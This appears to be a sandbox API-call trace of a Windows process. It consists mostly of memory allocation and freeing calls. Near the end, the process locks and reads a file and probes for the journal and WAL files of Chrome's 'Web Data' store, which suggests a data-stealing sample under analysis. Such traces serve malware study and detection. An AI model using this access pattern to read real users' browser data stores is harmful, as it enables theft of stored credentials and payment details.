	[0219.367] VirtualFree (lpAddress=0x2350000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.367] VirtualFree (lpAddress=0x2340000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.367] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x4) returned 0x2340000
	[0219.367] VirtualAlloc (lpAddress=0x0, dwSize=0x33, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000
	[0219.368] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x2370000
	[0219.368] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000
	[0219.368] VirtualFree (lpAddress=0x2370000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.369] VirtualFree (lpAddress=0x2350000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.369] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000
	[0219.369] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2370000
	[0219.370] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2390000
	[0219.370] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x23a0000
	[0219.370] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x23b0000
	[0219.370] VirtualFree (lpAddress=0x23a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.371] VirtualFree (lpAddress=0x2390000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.371] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x2390000
	[0219.372] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x23a0000
	[0219.372] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x23c0000
	[0219.373] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x23d0000
	[0219.373] VirtualFree (lpAddress=0x23c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.373] VirtualFree (lpAddress=0x23a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.374] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x23a0000
	[0219.374] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x23c0000
	[0219.375] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x23e0000
	[0219.375] VirtualQuery (in: lpAddress=0x23e0000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x23e0000, AllocationBase=0x23e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.375] VirtualFree (lpAddress=0x23e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.376] VirtualFree (lpAddress=0x23c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.376] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x23c0000
	[0219.377] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x23e0000
	[0219.377] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x23f0000
	[0219.378] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2400000
	[0219.378] VirtualAlloc (lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000
	[0219.379] VirtualQuery (in: lpAddress=0x2470000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2470000, AllocationBase=0x2470000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.379] VirtualFree (lpAddress=0x2470000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.379] VirtualFree (lpAddress=0x2460000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.380] VirtualQuery (in: lpAddress=0x24d0000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x24d0000, AllocationBase=0x24d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.380] VirtualFree (lpAddress=0x24d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.380] VirtualFree (lpAddress=0x24c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.381] VirtualQuery (in: lpAddress=0x2520000, lpBuffer=0x1b5da94, dwLength=0x1c | out: lpBuffer=0x1b5da94*(BaseAddress=0x2520000, AllocationBase=0x2520000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.381] VirtualQuery (in: lpAddress=0x2540000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2540000, AllocationBase=0x2540000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.381] VirtualFree (lpAddress=0x2540000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.382] VirtualFree (lpAddress=0x2530000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.382] VirtualQuery (in: lpAddress=0x2590000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2590000, AllocationBase=0x2590000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.382] VirtualFree (lpAddress=0x2590000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.383] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.383] ReadFile (in: hFile=0x114, lpBuffer=0x1748a00, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e178, lpOverlapped=0x1b5e13c | out: lpBuffer=0x1748a00*, lpNumberOfBytesRead=0x1b5e178*=0x800, lpOverlapped=0x1b5e13c) returned 1
	[0219.384] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.385] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.385] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.386] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.386] VirtualQuery (in: lpAddress=0x25b0000, lpBuffer=0x1b5da98, dwLength=0x1c | out: lpBuffer=0x1b5da98*(BaseAddress=0x25b0000, AllocationBase=0x25b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.386] VirtualQuery (in: lpAddress=0x25b0000, lpBuffer=0x1b5da94, dwLength=0x1c | out: lpBuffer=0x1b5da94*(BaseAddress=0x25b0000, AllocationBase=0x25b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.386] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.387] VirtualFree (lpAddress=0x2670000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.387] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.387] VirtualQuery (in: lpAddress=0x2690000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2690000, AllocationBase=0x2690000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.387] VirtualFree (lpAddress=0x2690000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.388] VirtualFree (lpAddress=0x2670000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.389] VirtualFree (lpAddress=0x26f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.389] VirtualFree (lpAddress=0x26e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.389] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.390] VirtualFree (lpAddress=0x26f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.390] VirtualFree (lpAddress=0x2730000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.390] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.391] VirtualQuery (in: lpAddress=0x2750000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2750000, AllocationBase=0x2750000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.391] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.391] VirtualFree (lpAddress=0x2730000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.392] VirtualFree (lpAddress=0x27a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.392] VirtualFree (lpAddress=0x2790000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.393] VirtualFree (lpAddress=0x27c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.393] VirtualFree (lpAddress=0x27a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.394] VirtualQuery (in: lpAddress=0x27f0000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x27f0000, AllocationBase=0x27f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.394] VirtualFree (lpAddress=0x27f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.394] VirtualFree (lpAddress=0x27e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.395] VirtualQuery (in: lpAddress=0x2810000, lpBuffer=0x1b5da98, dwLength=0x1c | out: lpBuffer=0x1b5da98*(BaseAddress=0x2810000, AllocationBase=0x2810000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.395] VirtualQuery (in: lpAddress=0x2810000, lpBuffer=0x1b5da94, dwLength=0x1c | out: lpBuffer=0x1b5da94*(BaseAddress=0x2810000, AllocationBase=0x2810000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.395] VirtualFree (lpAddress=0x2810000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.396] VirtualQuery (in: lpAddress=0x2900000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2900000, AllocationBase=0x2900000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.396] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.396] VirtualFree (lpAddress=0x28f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.397] VirtualFree (lpAddress=0x2950000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.398] VirtualFree (lpAddress=0x2940000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.398] VirtualFree (lpAddress=0x2970000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.398] VirtualFree (lpAddress=0x2950000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.399] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.399] VirtualFree (lpAddress=0x2970000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.400] VirtualQuery (in: lpAddress=0x29b0000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x29b0000, AllocationBase=0x29b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.400] VirtualFree (lpAddress=0x29b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.400] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.401] VirtualFree (lpAddress=0x29f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.402] VirtualFree (lpAddress=0x2a00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.402] VirtualFree (lpAddress=0x29e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.403] VirtualQuery (in: lpAddress=0x2a30000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2a30000, AllocationBase=0x2a30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.403] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.403] VirtualFree (lpAddress=0x2a00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.404] VirtualQuery (in: lpAddress=0x2a90000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2a90000, AllocationBase=0x2a90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.404] VirtualFree (lpAddress=0x2a90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.405] VirtualFree (lpAddress=0x2a80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.405] VirtualFree (lpAddress=0x2ae0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.406] VirtualFree (lpAddress=0x2af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.406] VirtualFree (lpAddress=0x2b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.407] VirtualQuery (in: lpAddress=0x2b00000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2b00000, AllocationBase=0x2b00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.407] VirtualFree (lpAddress=0x2b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.407] VirtualFree (lpAddress=0x2af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.408] VirtualQuery (in: lpAddress=0x2b80000, lpBuffer=0x1b5da64, dwLength=0x1c | out: lpBuffer=0x1b5da64*(BaseAddress=0x2b80000, AllocationBase=0x2b80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.408] VirtualFree (lpAddress=0x2af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.408] VirtualFree (lpAddress=0x2b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.409] VirtualFree (lpAddress=0x2b40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.409] VirtualFree (lpAddress=0x2b30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.409] VirtualFree (lpAddress=0x2b50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.410] VirtualQuery (in: lpAddress=0x2b00000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2b00000, AllocationBase=0x2b00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.410] VirtualFree (lpAddress=0x2b00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.410] VirtualFree (lpAddress=0x2af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.411] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5e140 | out: lpOverlapped=0x1b5e140) returned 1
	[0219.411] VirtualQuery (in: lpAddress=0x2be0000, lpBuffer=0x1b5dafc, dwLength=0x1c | out: lpBuffer=0x1b5dafc*(BaseAddress=0x2be0000, AllocationBase=0x2be0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.411] VirtualFree (lpAddress=0x2be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.412] VirtualFree (lpAddress=0x2bd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.413] LockFileEx (in: hFile=0x114, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5ede0 | out: lpOverlapped=0x1b5ede0) returned 1
	[0219.413] LockFileEx (in: hFile=0x114, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5edcc | out: lpOverlapped=0x1b5edcc) returned 1
	[0219.413] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5ede4 | out: lpOverlapped=0x1b5ede4) returned 1
	[0219.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89
	[0219.413] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x2bd0000
	[0219.413] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x2bd0000, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal") returned 89
	[0219.413] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-journal"), fInfoLevelId=0x0, lpFileInformation=0x1b5edd8 | out: lpFileInformation=0x1b5edd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.414] GetLastError () returned 0x2
	[0219.414] VirtualFree (lpAddress=0x2bd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.414] ReadFile (in: hFile=0x114, lpBuffer=0x1b5ee5c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x1b5ee4c, lpOverlapped=0x1b5ee10 | out: lpBuffer=0x1b5ee5c*, lpNumberOfBytesRead=0x1b5ee4c*=0x10, lpOverlapped=0x1b5ee10) returned 1
	[0219.414] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85
	[0219.414] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x2bd0000
	[0219.415] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x2bd0000, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal") returned 85
	[0219.415] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-wal"), fInfoLevelId=0x0, lpFileInformation=0x1b5ee08 | out: lpFileInformation=0x1b5ee08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.415] GetLastError () returned 0x2
	[0219.415] VirtualFree (lpAddress=0x2bd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.415] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x1b5ee24 | out: lpFileSizeHigh=0x1b5ee24*=0x0) returned 0x10000
	[0219.415] VirtualAlloc (lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x4) returned 0x2bd0000
	[0219.416] ReadFile (in: hFile=0x114, lpBuffer=0x1748160, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5ee18, lpOverlapped=0x1b5eddc | out: lpBuffer=0x1748160*, lpNumberOfBytesRead=0x1b5ee18*=0x800, lpOverlapped=0x1b5eddc) returned 1
	[0219.416] VirtualFree (lpAddress=0x2bd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.416] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5edb0 | out: lpOverlapped=0x1b5edb0) returned 1
	[0219.416] CloseHandle (hObject=0x114) returned 1
	[0219.416] VirtualQuery (in: lpAddress=0x1620000, lpBuffer=0x1b5f0ac, dwLength=0x1c | out: lpBuffer=0x1b5f0ac*(BaseAddress=0x1620000, AllocationBase=0x1620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.416] VirtualFree (lpAddress=0x1620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.417] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.417] VirtualFree (lpAddress=0x1640000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.418] VirtualFree (lpAddress=0x1630000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.418] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.419] VirtualFree (lpAddress=0x2b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.419] VirtualFree (lpAddress=0x2b70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.419] VirtualFree (lpAddress=0x1ae0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.420] VirtualFree (lpAddress=0x1fe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.420] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.420] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.421] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.421] VirtualFree (lpAddress=0x2190000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.421] VirtualFree (lpAddress=0x22d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.422] VirtualFree (lpAddress=0x2a20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.422] VirtualFree (lpAddress=0x2b20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.422] VirtualFree (lpAddress=0x2b60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.423] VirtualFree (lpAddress=0x2b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.423] VirtualFree (lpAddress=0x2aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.423] VirtualFree (lpAddress=0x2ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.424] VirtualFree (lpAddress=0x2ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.424] VirtualFree (lpAddress=0x2ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.424] VirtualFree (lpAddress=0x2a80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.425] VirtualFree (lpAddress=0x2a90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.425] VirtualFree (lpAddress=0x2a40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.425] VirtualFree (lpAddress=0x2a60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.426] VirtualFree (lpAddress=0x2a50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.426] VirtualFree (lpAddress=0x2a00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.426] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.427] VirtualFree (lpAddress=0x2a10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.427] VirtualFree (lpAddress=0x29c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.427] VirtualFree (lpAddress=0x29e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.428] VirtualFree (lpAddress=0x29d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.428] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.428] VirtualFree (lpAddress=0x29b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.429] VirtualFree (lpAddress=0x2910000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.429] VirtualFree (lpAddress=0x2930000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.429] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.430] VirtualFree (lpAddress=0x2940000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.430] VirtualFree (lpAddress=0x2980000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.431] VirtualFree (lpAddress=0x2950000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.431] VirtualFree (lpAddress=0x29a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.431] VirtualFree (lpAddress=0x2920000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.431] VirtualFree (lpAddress=0x28f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.432] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.432] VirtualFree (lpAddress=0x2800000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.432] VirtualFree (lpAddress=0x2820000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.433] VirtualFree (lpAddress=0x2830000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.433] VirtualFree (lpAddress=0x2840000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.434] VirtualFree (lpAddress=0x2850000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.434] VirtualFree (lpAddress=0x2860000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.434] VirtualFree (lpAddress=0x2870000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.435] VirtualFree (lpAddress=0x2880000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.435] VirtualFree (lpAddress=0x2890000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.435] VirtualFree (lpAddress=0x2810000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.436] VirtualFree (lpAddress=0x28b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.436] VirtualFree (lpAddress=0x28c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.436] VirtualFree (lpAddress=0x28d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.437] VirtualFree (lpAddress=0x28a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.437] VirtualFree (lpAddress=0x27e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.437] VirtualFree (lpAddress=0x27f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.437] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.438] VirtualFree (lpAddress=0x2780000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.438] VirtualFree (lpAddress=0x27b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.438] VirtualFree (lpAddress=0x2790000, dwSize=0x0, dwFreeType=0x8000) returned 1
